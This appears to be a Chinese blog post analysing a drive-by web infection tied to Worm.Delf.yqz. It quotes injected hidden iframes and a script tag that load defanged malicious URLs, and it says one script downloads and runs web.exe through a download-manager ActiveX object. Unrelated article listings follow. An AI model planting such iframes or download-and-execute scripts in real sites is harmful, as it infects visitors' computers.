栈溢出漏洞传播Worm.Delf.yqz

简介: 栈溢出漏洞传播Worm.Delf.yqz

今天在使用Web邮箱时,Kaspersky报告:

/---
已检测到: 恶意程序 Exploit.HTML.Ascii.o URL: hxxp://mm***.98*7**99***9.com/mm/a.htm
---/

Google搜索了一下,发现此代码是一种ARP病毒添加的。

检查发现网页都被加入了代码:

/---
<iframe SRC="hxxp://mm***.98*7**99***9.com/abc.htm" width="1" height="1" frameborder="0">
</iframe>
---/

hxxp://mm***.98*7**99***9.com/abc.htm 的标题为:mobile phone,内容为Service Unavailable,有迷惑性。

包含代码:

/---
<iframe src=hxxp://mm***.98*7**99***9.com/mm/a.htm width=100 height=0></iframe>
---/

hxxp://mm***.98*7**99***9.com/mm/a.htm 标题为:LOVE!,包含两段恶意代码。

其一是采用US-ASCII编码的字符串。

其二是代码:

/---
<Script language="Javascript" src="hxxp://mm***.98*7**99***9.com/mm/b.js"></Script>
---/

到  http://purpleendurer.ys168.com 下载US-ASCII编码解码程序解密后,得到一段网页代码,标题为:super IE 0Day,内容分为三个部分。

其一是javascript脚本代码,包含两个自定义函数MakeItSo()和detectOS(),MakeItSo()使用detectOS()检测浏览者电脑的Windows版本,如果是 Windows XP或Windows 2003,就打开logo.htm,否则打开banner.htm。

其二是VBScript脚本代码,功能是是创建对象 Microsoft.XMLHTTP,如果不成功就输出JavaScript脚本代码:

/---
<SCRIPT LANGUAGE="javascript">window.setTimeout(""MakeItSo()"",5000);</script>
---/

否则输出代码:

/---
<iframe width="0" height="0" src="apple.htm"></iframe>")
---/

其三是javascript脚本代码,功能是检测cookiewoshi0day是否存在,若不存在则创建,并输出代码:

/---
<iframe width=0 height=0 src=help.htm></iframe>
---/

hxxp://mm***.98*7**99***9.com/mm/b.js内容未加密,功能是利用ThunderServer.webThunder.1下载hxxp://www.98*7**99***9.com/web.exe,保存到c:/并运行。


相关文章
|
4天前
|
C语言
【数据结构】栈和队列(c语言实现)(附源码)
本文介绍了栈和队列两种数据结构。栈是一种只能在一端进行插入和删除操作的线性表,遵循“先进后出”原则;队列则在一端插入、另一端删除,遵循“先进先出”原则。文章详细讲解了栈和队列的结构定义、方法声明及实现,并提供了完整的代码示例。栈和队列在实际应用中非常广泛,如二叉树的层序遍历和快速排序的非递归实现等。
52 9
|
1天前
|
存储 JavaScript 前端开发
执行上下文和执行栈
执行上下文是JavaScript运行代码时的环境,每个执行上下文都有自己的变量对象、作用域链和this值。执行栈用于管理函数调用,每当调用一个函数,就会在栈中添加一个新的执行上下文。
|
3天前
|
存储
系统调用处理程序在内核栈中保存了哪些上下文信息?
【10月更文挑战第29天】系统调用处理程序在内核栈中保存的这些上下文信息对于保证系统调用的正确执行和用户程序的正常恢复至关重要。通过准确地保存和恢复这些信息,操作系统能够实现用户模式和内核模式之间的无缝切换,为用户程序提供稳定、可靠的系统服务。
21 4
|
7天前
|
算法 安全 NoSQL
2024重生之回溯数据结构与算法系列学习之栈和队列精题汇总(10)【无论是王道考研人还是IKUN都能包会的;不然别给我家鸽鸽丢脸好嘛?】
数据结构王道第3章之IKUN和I原达人之数据结构与算法系列学习栈与队列精题详解、数据结构、C++、排序算法、java、动态规划你个小黑子;这都学不会;能不能不要给我家鸽鸽丢脸啊~除了会黑我家鸽鸽还会干嘛?!!!
|
26天前
初步认识栈和队列
初步认识栈和队列
55 10
|
20天前
数据结构(栈与列队)
数据结构(栈与列队)
16 1
|
25天前
|
存储 JavaScript 前端开发
为什么基础数据类型存放在栈中,而引用数据类型存放在堆中?
为什么基础数据类型存放在栈中,而引用数据类型存放在堆中?
61 1
|
21天前
【数据结构】-- 栈和队列
【数据结构】-- 栈和队列
13 0
|
26天前
探索顺序结构:栈的实现方式
探索顺序结构:栈的实现方式
|
26天前
|
存储 C语言
栈和队列题目练习
栈和队列题目练习
15 0